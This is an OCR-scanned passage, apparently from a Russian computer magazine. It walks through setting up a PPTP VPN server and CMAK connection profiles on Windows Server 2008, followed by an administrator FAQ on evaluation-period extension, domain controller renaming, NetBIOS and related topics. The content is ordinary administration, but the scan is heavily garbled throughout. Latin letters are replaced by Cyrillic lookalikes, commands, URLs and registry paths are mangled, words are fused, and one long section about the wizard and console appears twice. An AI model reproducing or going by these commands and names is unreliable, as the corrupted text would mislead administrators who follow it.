вой интерфейс, который подключен к интернету (отметив его мышкой). 
Если мастер обнаружиттолько одно активное соединение, то он закончит 
работу с предупреждением, что для данного режима требуется еще одна 
сетевая карта, либо предложит перейти к настройкам в режиме «Особая 
конфигурация». 

Флажок«Безопасность с использованием фильтра статических пакетов» 
рекомендуется оставить взведенным. Такие фильтры пропускают ѴРМ- 
трафиктолько с указанного интерфейса, а исключения для разрешенных 
ѴРМ-портов придется настраивать вручную. При этом можно настраивать 
статические фильтры и брандмауэр ѴѴіпсІоѵѵз на одном интерфейсе, но не 
рекомендуется, так как это снизит производительность. 

На шаге «Назначение ІР-адресов» выбери способ получения ІР-адреса 
клиентами при подключении к ѴРМ-серверу: «Автоматически» либо «Из 
заданного диапазона адресов». Проверка подлинности учетной записи 
может быть произведена как сервером РРА5, так и любым другим сер- 
вером, поддерживающим протокол РАОІПБ. Поумолчанию предлагается 
первый вариант, но в большой сети с несколькими серверами РРА5 лучше 
использовать РА0ІП5. На этом работа мастера заканчивается. Нажимаем 
кнопку «Готово», и появившееся окно сообщает, что необходимо настро- 
ить «Агент ретрансляции ОНСР». Если РРА5 и ОНСР-сервер находятся в 
одном сегменте, и нет проблем с обменом служебных пакетов, тогда Реіау 
адепі: настраивать необязательно (кстати, на внутреннем интерфейсе он 
активируется поумолчанию). 

НАСТРОЙКИ В КОНСОЛИ 

в окне консоли теперь будет доступно дерево установок. Желательно 
пройтись по всем пунктам, чтобы разобраться, что где находится. Так, в 
пункте «Интерфейсы сети» будут показаны все настроенные ранее сете- 
вые интерфейсы. Выбрав в меню пункт «Создать новый интерфейс вы- 
зова по требованию», можно добавить подключение к ѴРМ или РРРоЕ- 
серверам. Для просмотра списка протоколов, используемых портов и их 
состояния переходим в «Порты». Кнопка «Настроить» в окне «Свойства» 
позволяет изменить параметры работы выбранного протокола. Напри- 
мер, по умолчанию количество РРТР-, Е2ТР- и 55ТР-подключений (пор- 
тов) ограничено 128, а также разрешены все подключения (удаленного 
доступа и потребованию). В качестве (необязательного) идентификатора 
сервера используется телефон, введенный в поле «Номер телефона для 
этого устройства». 

В пункте «Клиенты удаленного доступа» отображается список подключен- 
ных клиентов. Цифра рядом с названием пункта подскажет их количество. 
При помощи контекстного меню можно проверить состояние клиента и 
при необходимости его отключить. Два пункта ІРѵ4 и ІРѵб позволяют на- 
строить ІР-фильтры, статические маршруты, агент ВНСР-ретрансляции и 
некоторые другие параметры. 
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>> ЗѴН/АСК 




Мастер настройки пакета СМАЩ 



[Настройка портов в консолй^ 



метров работы переходим в «Диспетчере сервера» во вкладку «Роли^ 
Службы политики сети и доступа Службы маршрутизации и удаленного 
доступа»: как вариант, можно использовать консоль «Маршрутизация 
и удаленный доступ», вызываемую из вкладки «Администрирование» 
меню «Пуск». 

Отмечаем наш сервер в списке (консоль может быть подключена к не- 
скольким системам) и в контекстном меню щелкаем «Настроить и вклю- 
чить маршрутизацию и удаленный доступ» (Сопбдиге апб ЕпаЫе Роибпд 
апб Ретоіе Ассевз). Если до этого предпринимались попытки настроить 
службу, то для повторной установки некоторых параметров придется ее 
остановить, выбрав пункт «Отключить маршрутизацию и удаленный до- 
ступ». При этом все настройки будут сброшены. Появившийся мастер 
установки предложит выбрать типичную конфигурацию сервера, которая 
наиболее точно соответствует предполагаемым задачам. В меню выбора 
— пять пунктов, четыре из них предоставляют готовыеустановки: 

• Удаленный доступ (ѴРМ или модем) — позволяет пользователям под- 
ключаться через удаленное (коммутируемое) или безопасное (ѴРМ) под- 
ключение; 

• Преобразованиесетевыхадресов (МАТ) — предназначено для подклю- 
чения к интернету нескольких клиентов через один ІР-адрес; 

• Доступ к удаленной сети (ѴРМ) и МАТ — является миксом предыдущих 
пунктов, предоставляетвозможность выхода в интернетсодного ІР-адре- 
са и удаленного подключения; 

• Безопасное соединение между двумя сетями — подключение одной 
сети к другой, удаленной. 

Следующий шаг для каждого из этих пунктов будет индивидуальным. На- 
пример, при настройке 55ТР (см. статью «Слоеный ѴРМ» в ^-^_08_2008) мы 
выбирали третий сценарий. Для РРТР подойдетлюбой из предложенных 
вариантов, хотя рекомендуемым считается пункт «Удаленный доступ», 
установленный поумолчанию. Если есть затруднения при выборе схемы, 
выбери пятый пункт «Особая конфигурация», либо по окончании работы 
мастера продолжи настройку в ручном режиме. Кроме того, можно обра- 
титься кдокументации, нажав ссылку «Подробнее», расположенную вни- 
зу окна. 

На следующем шаге отмечаем список служб, которые следует включить на 
сервере. Таких пунктов пять, их названия говорят сами за себя: 

• Доступ к виртуальной частной сети (ѴРМ); 

• Удаленный доступ (через телефонную сеть); 

• Подключение по требованию (для маршрутизации отделений органи- 
зации); 

• Преобразование сетевых адресов (МАТ); 

• Маршрутизация локальной сети. 

Собственно, все предустановки, о которых говорилось выше, сводятся к 
активации этихслужб в разной комбинации. В большинстве случаев сле- 
дует выбрать «Удаленный доступ (ѴРМ или модем)», а затем — «Доступ к 



виртуальной частной сети (ѴРМ)». Далее просто нужно указать на сете- 
вой интерфейс, который подключен к интернету (отметив его мышкой). 
Если мастер обнаружиттолько одно активное соединение, то он закончит 
работу с предупреждением, что для данного режима требуется еще одна 
сетевая карта, либо предложит перейти к настройкам в режиме «Особая 
конфигурация». 

Флажок«Безопасность с использованием фильтра статических пакетов» 
рекомендуется оставить взведенным. Такие фильтры пропускают ѴРМ- 
трафиктолько с указанного интерфейса, а исключения для разрешенных 
ѴРМ-портов придется настраивать вручную. При этом можно настраивать 
статические фильтры и брандмауэр ѴѴіпсІоѵѵз на одном интерфейсе, но не 
рекомендуется, так как это снизит производительность. 

На шаге «Назначение ІР-адресов» выбери способ получения ІР-адреса 
клиентами при подключении к ѴРМ-серверу: «Автоматически» либо «Из 
заданного диапазона адресов». Проверка подлинности учетной записи 
может быть произведена как сервером РРА5, так и любым другим сер- 
вером, поддерживающим протокол РАОІПБ. Поумолчанию предлагается 
первый вариант, но в большой сети с несколькими серверами РРА5 лучше 
использовать РА0ІП5. На этом работа мастера заканчивается. Нажимаем 
кнопку «Готово», и появившееся окно сообщает, что необходимо настро- 
ить «Агент ретрансляции ОНСР». Если РРА5 и ОНСР-сервер находятся в 
одном сегменте, и нет проблем с обменом служебных пакетов, тогда Реіау 
адепі: настраивать необязательно (кстати, на внутреннем интерфейсе он 
активируется поумолчанию). 

НАСТРОЙКИ В КОНСОЛИ 

в окне консоли теперь будет доступно дерево установок. Желательно 
пройтись по всем пунктам, чтобы разобраться, что где находится. Так, в 
пункте «Интерфейсы сети» будут показаны все настроенные ранее сете- 
вые интерфейсы. Выбрав в меню пункт «Создать новый интерфейс вы- 
зова по требованию», можно добавить подключение к ѴРМ или РРРоЕ- 
серверам. Для просмотра списка протоколов, используемых портов и их 
состояния переходим в «Порты». Кнопка «Настроить» в окне «Свойства» 
позволяет изменить параметры работы выбранного протокола. Напри- 
мер, по умолчанию количество РРТР-, Е2ТР- и 55ТР-подключений (пор- 
тов) ограничено 128, а также разрешены все подключения (удаленного 
доступа и потребованию). В качестве (необязательного) идентификатора 
сервера используется телефон, введенный в поле «Номер телефона для 
этого устройства». 

В пункте «Клиенты удаленного доступа» отображается список подключен- 
ных клиентов. Цифра рядом с названием пункта подскажет их количество. 
При помощи контекстного меню можно проверить состояние клиента и 
при необходимости его отключить. Два пункта ІРѵ4 и ІРѵб позволяют на- 
строить ІР-фильтры, статические маршруты, агент ВНСР-ретрансляции и 
некоторые другие параметры. 
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» ЗѴМ/АСК 




> Ііпкз 

• Протокол РРТР до- 
кументирован в РРС 
2637 — ѵѵѵѵѵѵ.іеи.огд/ 
гі'с/гІсЗбЗУ.ІхІ:. 

• МРРЕ (МІСГ050Й - 
Роіпі-Ь-Роіпі: 
ЕпсгурЕоп) — ѵѵѵѵѵѵ.іеи. 
огд/гк/г1с3078.1:хЕ 

• МРРС (МІСГ050Й- 
Роіпі-Ь-Роіпі: 
Сотргеззіоп) — ѵѵѵѵѵѵ. 
іеи.огд/гІс/гкЗ1 18. 

ІхЕ 




> ѵісіео 

На прилагаемом 
кжурналу диске ты 
найдешь видеоролик, 
где показано, как 
поднять РРТР-сер- 
вер на базе ѴѴіп2к8 
и создать профиль 
подключения поль- 
зователя при помощи 
пакета СМАК. 



Когда все настройки завершены, можно попробовать под- 
ключиться клиентом. На этом этапе часто сталкиваются с 
ошибкой 649: «Пользователь не имеет прав для дозвона». 
По умолчанию проверка прав доступа пользователя про- 
изводится средствами Сервера политик сети — МР5. Про- 
верить установки можно, зайдя в «Администрирование 
Управление компьютером Служебные программы Ло- 
кальные пользователи и группы». Поэтому при появлении 
такого сообщения разреши выбранной группе подключаться 
к серверу политик (подробнее о МР5 читай в статье «Сете- 
вой коп», опубликованной в декабрьском номере журнала за 
2008 год). 

РАБОТА СО ВКУСОМ 

Нельзя не рассказать о еще одной возможности, которая 
заметно упростит жизнь администраторам — пакете адми- 
нистрирования диспетчера подключений СМАК (СоппесОоп 
Мападег АсІппіпізІгаОоп КК). Мастер СМАК создает профиль, 
который позволит пользователям входить в сеть только с 
теми свойствами подключения, которые определит для них 
админ. Это не новинка ѴѴіп2к8 — СМАК был доступен еще 
для ѴѴіп2к и поддерживает клиентов вплоть до ѴѴіп95. Тем не 
менее, провайдеры до сих пор снабжают пользователя муд- 
реными инструкциями вместо того, чтобы предоставить ему 
готовые файлы с настройками. 

СМАК является компонентом ѴѴіп2к8, но по умолчанию не 
инсталлируется. Сам процесс установки при помощи «Дис- 
петчера сервера» стандартен. Выбираем «Компоненты — 
Добавить компоненты» и в появившемся мастере отмечаем 
«Пакет администрирования диспетчера подключений». По 
окончании установки одноименный ярлык появится в меню 
«Администрирование». 

При вызове СМАК запустится мастер, который поможет 
создать профиль диспетчера подключений. На первом 
шаге выбери ОС, для которой предназначен профиль. До- 
ступны два варианта: Ѵізіа и ѴѴіпсІоѵѵз 2000/2003/ХР. Ос- 
новное их отличие состоит в том, что Ѵізіа поддерживает 
55ТР. Далее выбираем «Новый профиль». Есть возмож- 
ность использовать в качестве шаблона уже имеющийся 
профиль; последующие шаги предлагают объединить 
несколько профилей. Указываем название службы (поль- 



Р результате работы мастера настройки СМАК мы получим несколько файло^ 




зователи его увидят после установки пакета) и имя фай- 
ла, куда будет сохранен профиль. При создании профиля 
службы мастер СМАК копирует все входящие в этот про- 
филь файлы в Ргодгат ЕіІезѴСМАКѴРгобІез. В некоторых 
сетях при проверке подлинности используется имя облас- 
ти (Реаіт пате), например, в ѴѴіпсІоѵѵз это имя АО домена 
(изегИсІоппаіп.сопп). Мастер позволяет задать такое имя 
области, которое будет автоматически добавлено к логи- 
ну. И, наконец, добавляем поддержку ѴРМ-подключений. 
Активируем флажок «Телефонная книга из этого профиля» 
и затем выбираем «Всегда использовать один ѴРМ-сер- 
вер» или «Разрешить пользователю выбирать ѴРМ-сер- 
вер перед соединением». Во втором случае требуется за- 
ранее подготовить Іхі-файл со списком серверов (формат 
файла до.тісго5оК.соппДѵѵ[іпк/?ипкІсІ^80962 ). На этапе 
«Создать или изменить» выбираем «Изменить», чтобы 
появилосьокно«Правка ѴРМ». Здесь три вкладки (при ак- 
тивном ІРѵб — четыре). В «Общие» отмечаем «Отключить 
общий доступ к файлам и принтерам» (в большинстве слу- 
чае в та кая функциональность не требуется). В ІРѵ4 указы- 
ваются адреса основного и дополнительного ВМ5 и ѴѴІМ5 
серверов. Установкой соответствующих флажков можно 
указать на использование РРТР-подключения как шлю- 
за по умолчанию и активировать сжатие ІР-заголовков. 
Настройки безопасности производятся в одноименной 
вкладке. Здесь указываем, обязательно ли использовать 
шифрование, и отмечаем необходимые методы аутенти- 
фикации. Список «Стратегия ѴРМ» позволяет указать, 
какой метод будет использован при подключении кѴРМ- 
серверу. Возможно два варианта: только один протокол 
или перебор протоколов до успешной активации соеди- 
нения. В контексте статьи нас интересует «Использовать 
только РРТР» или «Сначала РРТР». Здесь все, — закры- 
ваем окно и двигаемся дальше. 

Страница «Добавить телефонную книгу» позволяет задать 
номера, используемые для подключения к сііаі-ир серверу. 
При необходимости можно также настроить автоматичес- 
кое обновление списка номеров. Страница «Настроить за- 
писи удаленного доступа к сети», а также окно, появляю- 
щееся при нажатии «Изменить», сходны по содержанию с 
«Создать или изменить». Следующий шаг позволяет моди- 
фицировать таблицы маршрутизации на подключившихся 
клиентах: в большинстве случаев лучше оставить «Не из- 
менять таблицы маршрутизации». Если нужно, указываем 
параметры прокси для ІЕ. Кроме стандартных установок, 
мастер позволяетустановить действия, которые могут быть 
выполнены на разных этапах подключения клиента (на- 
пример, запустить программу). Далее задаем значки для 
разных ситуаций (окна подключения, телефонной книги 
и так далее), выбираем файл справки, сведения о поддер- 
жке. При необходимости включаем в профиль диспетчер 
подключений. Это может быть полезно для клиентских сис- 
тем, на которыхустановлена ОС, не содержащая диспетчер. 
Сюда же можно добавить текстовый файл с лицензионным 
соглашением и дополнительные файлы, которые будут пос- 
тавляться с профилем. На этом работа мастера окончена — в 
резюме будет показан путь кустановочному файлу. Копиру- 
ем его в общедоступную папку, чтобы пользователи могли 
свободно скачать. 

Теперь юзерам достаточно запустить исполняемый файл и 
ответить на один-единственный вопрос: сделать это под- 
ключен недоступным для «Всех пользователей» ил и «Только 
мне». После чего значок нового соединения будет добавлен 
в «Сетевых подключениях», и появится окно регистрации, 
в котором необходимо ввести свой логин и пароль. Очень 
удобно! 
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[Весьма осн ащенная функционально, ѴѴіп2к8 проста в управлении и чрез- 

Івычайно гибка в настройках. Но система имеет свои особенности — ес- 

^ 

:ественно, по мере освоения появляются вопросы. Отвечаем на самые 




распространенные из них. 




КАК ПРОДЛИТЬ ОЦЕНОЧНЫЙ ПЕРИОД? 

Дистрибутив можно свободно скачать С сайта МісгозоЙ, и он будет полно- 
стью работоспособен в течение 60 дней, после чего появится окно с со- 
общением о необходимости регистрации. Проверить количество дней до 
окончания текущего 60-дневного периода можно, введя команду «зітд г. 
ѵЬз -Об». Но если срок окажется мал, можно продлить оценочный пери- 
од еще три раза по 60 дней, — то есть, суммарно он может составлять до 
240 дней. Механизм продления прост. По окончании 60 дней для сброса 
периода вводим команду «зІтдг.ѵЬз -геагт» и перезагружаем систему. 
Все подробности описаны в документе КВ948472 [ зиррогі.тісгозой.сопп/ 
кЬ/948472 ). Там же можно найти пример скрипта, который позволит авто- 
матизировать эту задачу с использованием планировщика. Но исполь- 
зовать такой сервер в производственной среде нежелательно, режим 
предназначен только для тестирования. 

КАК ЛОКАЛИЗОВАТЬ ѴѴІМ2К8? 

Версия ѴѴіп2к8, доступная для закачки на сайте МісгозоЙ, предлагает- 
ся только с английским, немецким, французским, испанским и японским 
языками интерфейса (хотя корпоративным пользователям уже поставля- 
ется локализованный дистрибутив). Чтобы самостоятельно русифициро- 
вать ѴѴіп2к8, первымделом нужно скачать«Пакет многоязыкового интер- 
фейса пользователя для ѴѴіпбоѵѵз Зегѵег 2008» (ѴѴіпбоѵѵз Зегѵег 2008 МІЛ 
Іапдиаде Раск) в центре загрузки ѵѵѵѵѵѵ.ппісгозой. сот . Русский содержит- 



ся втретьей группе. В зависимости от разрядности системы (32 и 64) требу- 
ется выбрать свой вариант: ХХХ_х86Іге_5егѵег_ІР_4-КРМ51Р4_ВѴВ.ітд 
или ХХХ_атб64Іге_5егѵег_ІР_4-КРМ51РХ4_ВѴВ.ітд. Для Йапіит (іа64) 
пока такой пакет недоступен. Установка несколько нестандартна, но, воб- 
щем-то, проста. Записываем 1М6-образ на диск или извлекаем каталог 
нужного языка. Вызываем консоль «Редіопаі апб Іапдиаде ОрОопз». Во 
вкладке«КеуЬоагб5апб Іа пдиадез» нажимаем Іпзіаи/ипіпзіаіиапдиадез 
и в появившемся менеджере указываем на каталоге Языковы ми файлами. 
Если приходится частоустанавливатьсистемутолучшим вариантом будет 
пересборка образа при помощи ѴѴАІК. Для Нурег-Ѵ также выпущен пакет 
локализации Нурег-Ѵ Іапдиаде Раск ( 5цррогЕтісго5оЙ.сот/кЬ/951636 ). 

ВОЗМОЖНО ЛИ ОБНОВИТЬ АО ОѴІЫ2КЗ ДО ѴѴІМ2К8? 

Перевести домен с ѴѴіп2кЗ на ѴѴіп2к8 можно тремя способами. Первый 
— обновить систему. Из-за большой разницы в архитектуре и функциях 
здесь зал ожено много подводных камней. Та к, ѴѴіп2кЗ обязательно должен 
быть с 5Р1/5Р2 или версии Р2. Обновить систему можно только до «Рий 
іпзіаиабоп», до Зегѵег Соге — нельзя. Не поддерживается апдейт пере- 
крестной архитектуры и разных версий. То есть, на х86 ѴѴіп2кЗ нельзя пос- 
тавить х64, а из Епіегргізе ЕбіЕоп нельзя сделать Зіапбагб Ебібоп. Хотя 
в последнем случае есть одно исключение: поддерживается обновление 
Зіапбагб до Епіегргізе. Также следует помнить об отличиях в системных 
требованиях, ресурсных ограничениях и настройках системы. Некоторые 
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изэтихвопросовосвещены вдокументе«ѴѴ52008: УрдгасІеРаіЬз, Резоигсе 
иппііз & Редізігу Ѵаіиез», который можно найти на Ыодз.ІесЬпеІ.сот . 
Второй вариантперехода АО заключается втом, чтобы добавитьновый конт- 
роллернаѴѴіп2к8ипослеуспешной репликации передать рольРІехіЫеЗіпдІе 
МазІегОрегабопз (Р5М0) новому серверу, который и будетглавным вдомене. 
Вероятность остаться с неправильно настроенной АО минимальна. 

Наконец, третий вариант — задействовать инструмент миграции Асбѵе 
ОігесЬгу Мідгабоп Тооі (АОМТ): он позволит перенести учетные записи 
пользователей и компьютеров, локальные и глобальные группы, довери- 
тельныеотношения. ПодойдетАОМТ версии 3.1 (можноскачатьссайта мел- 
комягких), а документ «АОМТ ѵЗ.1 биісіе: Мідгабпд апб Резігисіигіпд Асбѵе 
ОігесЬгу Оотаіпз» поможет разобраться стем, какого использовать. 

ГДЕМ0ЙМЕТВІ05? 

В больших сетях, управляемых Асбѵе ОігесЬгу служба МеіВІОЗ — излиш- 
няя роскошь, и многиеадмины отказываются от ее установки, задействуя 
для разрешения имен ОМ5. Тем не менее, бывает, возникает необходи- 
мостьвтакой службе. Например, контроллеры домена неправильноотоб- 
ражают подключенные к сети компьютеры, или нужна короткая ссылка 
для «быстрого» доступа. После обновления до ѴѴіп2к8 или установки но- 
вой системы служба «Обозреватель компьютеров» по умолчанию отклю- 
чена. Активировать ее можно несколькими способами. Самый простой: 
вызвать ММС-консоль «Службы» (Пуск Администрирование) и уста- 
новить запуск «Обозреватель компьютеров» в Авто. Во вкладке «Вход в 
систему» дополнительно можно указать учетную запись, используемую 
службой при входе в систему. Кстати, обрати внимание, — служба «Модуль 
поддержки МеіВІОЗ через ТСР/ІР» по умолчанию запущена. 

Настройками служб возможно управлять и из командной строки при по- 
мощи утилиты зс. С полным списком параметров можно познакомиться, 
введя «зс сопбд /?». Стартуем: 



> зс зСагС Ьгоѵ7зег 



Для анализа работы МеіВІСВ обычно используют штатную команду «пеі: 
ѵіеѵѵ», как вариант — утилиту Вгоѵѵзіакехе. Последняя имеется в ката- 
логе зиррогі: установочного диска (до ѴѴіп2к8) или в комплекте Вгоѵѵсоп 
(МеіВІСЗ Вгоѵѵзіпд Сопзоіе), ссылку на который можно найти на странице 
зиррогкппісгозоІІ.сопп/кЬ/3 18092 . После чего запускаем: 

> Ьгоѵ^зДаЦ . ехе зСаСиз ШККСКОІІР 



КАК СКРЫТЬ ОТ ПОЛЬЗОВАТЕЛЯ 
ОПРЕДЕЛЕННЫЕ СЕТЕВЫЕ КАТАЛОГИ? 

Среднестатистический пользователь — существо любопытное и все вре- 
мя пытается получить доступ к ресурсам, на которыеу него нет прав. Мало 



того, что он бесполез но тратит на это свое время,такещеи дергаетадмина 
вопросами типа: «объясни, почему мне нельзя?». Не стоит забывать и о 
том, что при таких безуспешных попытках система аудита заваливается 
«лишними» событиями. Самый простой выход из ситуации: просто не по- 
казывать пользователю общие папки, на которыеу него нет прав. А помо- 
жет в этом технология Ассезз-ВазесІ Епитегабоп (АВЕ, «Перечисление 
на основе доступа»). Статус АВЕ для каждой сетевой папки можно узнать 
и установить при помощи консоли«Управлениеобщими ресурсами ихра- 
н ил и щами» (5Ьаге апб Віогаде Мападетепі;). Просто выбираем свойства 
нужного ресурса и смотрим значение поля «Перечисление на основе до- 
ступа». Чтобы изменить настройки, нажимаем кнопку «Дополнительно» и 
устанавливаем/снимаем одноименный флажок. 

ЕСТЬ ЛИ ГРАФИЧЕСКИЕ ИНСТРУМЕНТЫ 
ДЛЯ УПРАВЛЕНИЯ 5ЕЯѴЕЯ СОРЕ? 

Сдной из особенностей ѴѴіп2к8 стала возможность ее использования без 
графической оболочки. Несмотря на все плюсы такого режима, настраи- 
вать систему из консоли на порядок сложнее. Выход из ситуации предло- 
жен сторонними разработчиками, — благодаря ихусилиям, мы получили 
три бесплатные утилиты, практически ничем не отличающиеся функцио- 
нально и носящие одинаковое название — «Соге Сопбдигаіог». 

Самой первой и поэтому известной является Соге Сопбдигаіог от Гая Те- 
веровского. Эта программа предлагает графический интерфейс для на- 
стройки более десятка параметров Эегѵег Соге, которыми пришлось бы 
управлять из командной строки: настройка сетевого интерфейса, экрана, 
времени и часового пояса, Ветоіе Ве5к1;ор,учетныхзаписей, брандмауэ- 
ра, ѴѴіп В М, установка ролей и компонентов, активация продукта. Ксожале- 
н ИЮ, автор из-за разногласий с работодателем прекратил разработку этой 
утилиты и убрал ссылку с домашней страницы. Но ничто не мешает найти 
ее на других ресурсах, чутокпогугл и в. Второй ЭегѵегСоге Сопбд и гаЬг раз- 
рабатывается в рамках проекта СосіеРІех ( ѵѵѵѵѵѵ.сосІерІех.сопп/СогеСопбд) 
под лицензией Місгозоб; РиЫіс Еісепзе (Мз-РЕ). Этот пакет представляет 
собой коллекцию скриптов, которые помогут в графической среде быстро 
настроить систему и сервисы. Венчает список конфигураторов ЗтагіХ 
СогеСопЛдигаІог ( ѵѵѵѵѵѵ.зппагі-х.сопп ). распространяемый под бесплат- 
ной (для некоммерческого использования) лицензией. 

ЧТО ТАКОЕ 610ВА1ЫАМЕ5 В ѴѴІЫООѴѴБ 5ЕЯѴЕЯ 2008? 

В службе ВМ5-сервера реализована поддержка зоны ОІоЬаІМаппез, 
предназначенной для хранения однокомпонентных имен (отметим, что 
разрешение однокомпонентных имен обеспечивается, только если все 
полномочные ВМЭ-серверы работают под управлением ѴѴіп2к8). В неко- 
торых ситуациях ее применение позволяет полностью отказаться отѴѴІМЭ 
(разрешение имен МеіВІОЭ в ІР-адреса). Почему не во всех? В отличие 
отѴѴІМЭ, зона ОЬЬаІМатез работает только с ограниченным набором 
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имен (как правило, серверов и веб-узлов) и не предназначена для раз- 
решения имен большого количества рабочих станций. Хотя тут есть плюс 
— областью репликации ОІоЬаІМатез является весь лес, что гаранти- 
рует использование действительно уникальных имен. Предусмотрено 
использование ОІоЬаІМатез с несколькими лесами. Зона ОІоЬаІМатез 
не поддерживает динамические обновления. Создание и обслуживание 
записей производится вручную. 

Для активации в рабочем ОМЗ-сервере зоны ОІоЬаІМатез следует вы- 
звать «Диспетчер 0М5» (0М5 Мападег) и в контекстном меню, на пункте 
«Зоны прямого просмотра» (РогѵѵагсІ Ьоокир Хопез), щелкнуть «Создать 
новую зону» (МеѵѵХопе). В появившемся мастере нужно выбрать«Основ- 
ная зона» и отметить флажком пункт«Сохранятьзону в АсЬѵе ВігесЬгу». В 
качестве имени зоны вводим ОІоЬаІМатез. Чтобы отказаться отдинами- 
ческого обновления, устанавливаем переключатель в «Запретить дина- 
мические обновления» (Во по! аЬоѵѵсІупатіс ирсіаіез). 

КАК ПЕРЕИМЕНОВАТЬ КОНТРОЛЛЕР ДОМЕНА? 

Чтобы переименовать контроллер домена на ѴѴіп2к8, нужно выпол- 
нить несколько достаточно простых операций. Это — в теории, а на 
практике все происходит не та к гладко. В каждой ситуации приходится 
разбираться отдельно. Например, присутствие на КД Центра Сертифи- 
кации (СА) означает, что сменить имя КД или его роль будет непросто. 
Наличие ЕхсЬапде также создает проблемы. В более ранних версиях 
системы для этого предлагалась утилита ВЕМВОМ (Вепате Вотаіп), 
которую тоже можно использовать с ѴѴіп2к8, если функциональный 
уровень домена не вышеѴѴіп2кЗ. Скачай ВЕМВОМ по ссылке на стра- 
нице іесЬпеЕтісі 030 іЕсот/еп-из/ѵѵіпсІоѵѵззегѵег/Ь 6405948. азрх . там 
же найдешь иописаниеее работы. В ѴѴіп2к8 для переименования ис- 
пользуется утилита МЕТВОМ, которая также была доступна в ранних 
версиях системы. 

Необязательно выполнять команду на самом КД, достаточно, чтобы поль- 
зователь, выполняющий ее, имел права администратора домена. Напри- 
мер, переименуем домен зегѵег.сот в зегѵег.ги: 

> ЫЕТВОМ сотриЦегпате зегѵег.сот /асій: зегѵег . ги 

После чего перезагружаем КД. В ВМЗ-сервере должна появиться А-за- 
пись с новым именем. Некоторое время потребуется на репликацию на- 
строек на другие полномочные ВМЗ-сервера. Затем даем команду: 

> ЫЕТВОМ сотриДегпате зегѵег.сот /такергітагу : зегѵег . ги 
Опять перезагружаемся и удаляем старый домен: 

> ЕЕТВОМ сотриВегпате зегѵег.ги /гетоѵе : зегѵег . сот 



Проверить добавление нового имени можно при помощи консоли АВ5І 
Есііі: (АбзіЕсІіЕтзс), которая теперь является компонентом системы. И 
поэтому, в отличие от ѴѴіп2кЗ, скачивать ее не нужно. Для установки 
АВ5І ЕсІіІ: выбираем в Диспетчере сервера «Добавить компоненты» и 
в окне компонент раскрываем список «Средства удаленного админис- 
трирования сервера» (Ветоіе Зегѵег АбтіпізІгаЬоп Тооіз). Затем пе- 
реходим в «Средства администрирования ролей» (Воіе АбтіпізІгаЬоп 
Тооіз) — «Средства доменных служб АсЬѵе Вігесіогу» (АсЬѵе Вігесіогу 
Вотаіп Зегѵісез Тооіз) и отмечаем «Средства контроллера домена 
АсЬѵе Вігесіогу» (АсЬѵе Вігесіогу Вотаіп СопІгоиегТооІз). После этого 
вызываем утилиту из командной строки или через пункт «Редактиро- 
вание АВ5І» в меню «Пуск — Администрирование». Подключаемся к 
КД и находим атрибут тзВЗ-АсІсІіЬопаІВпзНозіМате, который должен 
содержать новое значение. 

ВОЗМОЖНА ЛИ ВРЕМЕННАЯ 
ОСТАНОВКА КОНТРОЛЕРА ДОМЕНА? 

При обслуживании контроллера домена во избежание ненужных реп- 
ликаций может понадобиться временная остановка службы АсЬѵе 
Вігесіогу. Например, чтобы проверить целостность баз данных АВ при 
помощи утилиты МЫзиЫ, ранее было необходимо перезагружаться 
в режим восстановления В5РМ (Вігесіогу Зегѵісез Резіоге Мобе) по 
клавише <Е8> во время начальной загрузки. Так как в ѴѴіп2к8 АВ функ- 
ционирует в качестве сервиса, то процесс остановки выглядит доста- 
точно просто. Ты найдешь ее вместе состальными сервисами в консоли 
«Службы». Называется она «Службы домена АсЬѵе Вігесіогу» (АсЬѵе 
Вігесіогу Вотаіп Зегѵісез), и ее можно останавливать и перезапускать, 
как и любую другую. Хотя некоторые внутренние отличия все же есть. 
Так, при остановке АВ обязательно отключаем и все зависящие от нее 
службы (они перечислены во вкладке «Зависимости»): «Центр распре- 
деления ключей КегЬегоз» (КегЬегоз Кеу ВізІгіЬиЬоп Сепіег), «Сер- 
вер ВМЗ», «Перекрестный обмен сообщениями» (Іпіегзііе Меззадіпд), 
«Репликация ВЕЗ» (ВЕЗ РерІісаЬоп). 

В командной строке остановка/запуска службы АВ ВЗ выглядит еще 
проще: 

> зс зСор ЫТВЗ 

> зс зСагС ЫТВЗ 

Когда служба АВ ВЗ остановлена, можно подключаться к домену через 
другой КД. 

Кроме этого, в ѴѴіп2к8 есть возможность изменить установки ВЗРМ- 
входа. Для этого устанавливаем ключ реестра НКЕМ\Зуз1:ет\ 
СиггепЮопІгоІЗеЦСопІгоЦЕзаѴВЗРМАбтіпЕодопВеЬаѵіог в одно из 
следующих значений: 
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• О (по умолчанию) — администратор не может 
войти в ВЗКМ без подтверждения соответствую- 
щих прав в домене, полученных с другого КД; 

• 1 — администратор может войти в ВЗКМ, когда 
АВ ВЗ остановлен; 

• 2 — администратор может войти в ВЗКМ в любое 
время . 

КАК МНЕ УЗНАТЬр БУДЕТ Л И МОЕ 
ПРИЛОЖЕНИЕ РАБОТАТЬ В ѴѴІМ2К8? 

Самый верный способ — установить и проверить работос- 
пособность. Правда, для этого придется собрать «тестовый 
стенд», что не всегда возможно (не все ситуации можно эму- 
лировать). Чтобы упроститьжизнь разработчикам, админис- 
траторам и пользователям, предлагаются две программы 
подтверждения совместимости: 

• ѴѴогкз ѴѴіШ ѴѴіпсІоѵѵз Зегѵег 2008 — показывает, что ус- 
пешно пройдены все тесты на совместимость для указанной 
платформы; 

• СегОбесІ Іо г ѴѴіпсІоѵѵз Зегѵег 2008 — приложение соответс- 
твуеттребованиям Майкрософт, необходимым для успешной 
работы, и может использоваться при выполнении критичес- 
кихзадач. 

Также приложение может получить дополнительное обоз- 
начение Нурег-Ѵ, гарантирующее успешную работу в вир- 
туализированной среде. Самостоятельно протестировать 
приложение по условиям программы ѴѴогкз ѴѴІІЬ можно 
при помощи утилиты ѴѴогкз ѴѴііЬ Тооі Іог ѴѴіпсІоѵѵз Зегѵег 
2008 (ѴѴѴѴТ). Параметров при тестировании проверяется 
достаточно много, но утилита включает добротный поша- 




ДР5І ЕсНі входит в состав ѴѴіп2кВ 



говый мастер, который проведет пользователя через весь 
процесс оценки ПО. 

В процессе работы мастера предстоит заполнить сведе- 
ния о версии программы и производителе, оборудовании 
системы — и так далее. ѴѴѴѴТ сравнит систему до и после 
установки приложения, выдаст информацию о располо- 
жении файлов. Результат обычно оформляется в виде 
НТМІ-отчета или в пакете специального формата, кото- 
рый можно отправить МісгозоІІ для анализа и получения 
статуса. 

МОЖНО Л И из ѴѴІМ2К8 СДЕЛАТЬ 
РАБОЧУЮ СИСТЕМУ? 

